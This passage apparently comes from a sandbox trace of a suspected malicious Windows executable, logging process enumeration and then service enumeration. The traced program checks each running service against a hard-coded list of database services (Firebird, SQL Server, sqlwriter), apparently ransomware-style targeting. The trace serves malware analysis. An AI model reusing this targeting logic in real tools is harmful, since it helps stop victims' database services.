cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0071.604] lstrlenW (lpString="rebel.exe") returned 9 [0071.604] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0071.604] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0071.604] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0071.606] lstrlenW (lpString="conhost.exe") returned 11 [0071.606] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0071.607] lstrlenW (lpString="conhost.exe") returned 11 [0071.607] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0071.608] lstrlenW (lpString="hgaibc.exe") returned 10 [0071.608] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0071.608] lstrlenW (lpString="cmd.exe") returned 7 [0071.608] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0071.609] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0071.609] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0071.610] lstrlenW (lpString="conhost.exe") returned 11 [0071.610] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0071.611] lstrlenW (lpString="conhost.exe") returned 11 [0071.611] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.611] lstrlenW (lpString="svchost.exe") returned 11 [0071.611] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.612] lstrlenW (lpString="svchost.exe") returned 11 [0071.612] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0071.613] lstrlenW (lpString="LogonUI.exe") returned 11 [0071.613] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0071.614] lstrlenW (lpString="mode.com") returned 8 [0071.614] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0071.614] CloseHandle (hObject=0x394) returned 1 [0071.614] Sleep (dwMilliseconds=0x1f4) [0072.145] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ee80 [0072.146] EnumServicesStatusExW (in: hSCManager=0x60ee80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0072.146] GetLastError () returned 0xea [0072.146] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1d5a) returned 0x3cd2e68 [0072.146] EnumServicesStatusExW (in: hSCManager=0x60ee80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3cd2e68, cbBufSize=0x1d5a, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3cd2e68, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0072.147] CloseServiceHandle (hSCObject=0x60ee80) returned 1 [0072.147] lstrlenW (lpString="Appinfo") returned 7 [0072.147] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0072.147] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0072.147] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0072.147] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0072.147] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0072.147] lstrlenW (lpString="AppXSvc") returned 7 [0072.147] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0072.147] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0072.147] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0072.147] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0072.147] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0072.147] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0072.147] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0072.147] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0072.147] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0072.147] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0072.147] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0072.147] lstrlenW (lpString="Audiosrv") returned 8 [0072.147] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0072.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0072.148] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0072.148] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0072.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0072.148] lstrlenW (lpString="BFE") returned 3 [0072.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0072.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0072.148] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0072.148] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0072.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0072.148] lstrlenW (lpString="BITS") returned 4 [0072.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0072.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0072.148] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0072.148] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0072.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0072.148] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0072.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0072.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0072.148] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0072.148] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0072.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0072.148] lstrlenW (lpString="CDPSvc") returned 6 [0072.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0072.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0072.148] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0072.148] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0072.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0072.148] lstrlenW (lpString="ClickToRunSvc") returned 13 [0072.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0072.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0072.148] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0072.149] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0072.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0072.149] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0072.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0072.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0072.149] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0072.149] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0072.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0072.149] lstrlenW (lpString="CryptSvc") returned 8 [0072.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0072.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0072.149] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0072.149] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0072.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0072.149] lstrlenW (lpString="DcomLaunch") returned 10 [0072.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0072.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0072.149] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0072.149] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0072.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0072.149] lstrlenW (lpString="DeviceAssociationService") returned 24 [0072.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0072.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0072.149] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0072.149] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0072.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0072.149] lstrlenW (lpString="Dhcp") returned 4 [0072.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0072.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0072.149] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0072.149] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0072.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0072.149] lstrlenW (lpString="Dnscache") returned 8 [0072.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0072.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0072.149] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0072.150] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0072.150] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0072.150] lstrlenW (lpString="DoSvc") returned 5 [0072.150] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0072.150] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0072.150] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0072.150] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0072.150] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0072.150] lstrlenW (lpString="DPS") returned 3 [0072.150] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0072.150] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0072.150] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0072.150] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0072.150] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0072.150] lstrlenW (lpString="DusmSvc") returned 7 [0072.150] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0072.150] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0072.150] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0072.150] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0072.150] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0072.150] lstrlenW (lpString="EventLog") returned 8 [0072.150] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0072.150] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0072.150] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0072.150] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0072.150] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0072.150] lstrlenW (lpString="EventSystem") returned 11 [0072.150] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0072.150] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0072.150] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0072.150] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0072.150] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0072.150] lstrlenW (lpString="FontCache") returned 9 [0072.150] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0072.150] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0072.151] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0072.151] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0072.151] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0072.151] lstrlenW (lpString="gpsvc") returned 5 [0072.151] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0072.151] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0072.151] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0072.151] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0072.151] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0072.151] lstrlenW (lpString="iphlpsvc") returned 8 [0072.151] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0072.151] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0072.151] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0072.151] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0072.151] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0072.151] lstrlenW (lpString="KeyIso") returned 6 [0072.151] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0072.151] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0072.151] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0072.151] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0072.151] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0072.151] lstrlenW (lpString="LanmanServer") returned 12 [0072.151] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0072.151] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0072.151] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0072.151] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0072.151] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0072.151] lstrlenW (lpString="LanmanWorkstation") returned 17 [0072.151] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0072.151] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0072.151] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0072.151] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0072.151] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0072.151] lstrlenW (lpString="lfsvc") returned 5 [0072.151] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0072.152] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0072.152] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0072.152] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0072.152] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0072.152] lstrlenW (lpString="lmhosts") returned 7 [0072.152] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0072.152] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0072.152] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0072.152] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0072.152] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0072.152] lstrlenW (lpString="LSM") returned 3 [0072.152] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0072.152] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0072.152] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0072.152] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0072.152] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0072.152] lstrlenW (lpString="MapsBroker") returned 10 [0072.152] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MapsBroker") returned -1 [0072.152] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MapsBroker") returned -1 [0072.152] lstrcmpiW (lpString1="sqlwriter", lpString2="MapsBroker") returned 1 [0072.152] lstrcmpiW (lpString1="mssqlserver", lpString2="MapsBroker") returned 1 [0072.152] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MapsBroker") returned 1 [0072.152] lstrlenW (lpString="MpsSvc") returned 6 [0072.152] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0072.152] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0072.152] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0072.152] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0072.152] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0072.152] lstrlenW (lpString="NcbService") returned 10 [0072.152] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0072.152] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0072.152] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0072.152] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0072.152] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0072.152] lstrlenW (lpString="netprofm") returned 8 [0072.153] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0072.153] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0072.153] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0072.153] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0072.153] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0072.153] lstrlenW (lpString="NlaSvc") returned 6 [0072.153] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0072.153] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0072.153] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0072.153] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0072.153] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0072.153] lstrlenW (lpString="nsi") returned 3 [0072.153] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0072.153] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0072.153] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0072.153] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0072.153] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0072.153] lstrlenW (lpString="PcaSvc") returned 6 [0072.153] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0072.153] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0072.153] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0072.153] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0072.153] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0072.153] lstrlenW (lpString="PlugPlay") returned 8 [0072.153] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0072.153] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0072.153] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0072.153] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0072.153] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0072.153] lstrlenW (lpString="Power") returned 5 [0072.153] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0072.153] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0072.153] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0072.153] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0072.153] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0072.155] lstrlenW (lpString="ProfSvc") returned 7 [0072.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0072.156] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0072.156] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0072.156] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0072.156] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0072.156] lstrlenW (lpString="RpcEptMapper") returned 12 [0072.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0072.156] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0072.156] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0072.156] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0072.156] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0072.156] lstrlenW (lpString="RpcSs") returned 5 [0072.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0072.156] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0072.156] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0072.156] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0072.156] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0072.156] lstrlenW (lpString="SamSs") returned 5 [0072.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0072.156] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0072.156] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0072.156] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0072.156] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0072.156] lstrlenW (lpString="Schedule") returned 8 [0072.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0072.156] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0072.156] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0072.156] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0072.156] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0072.156] lstrlenW 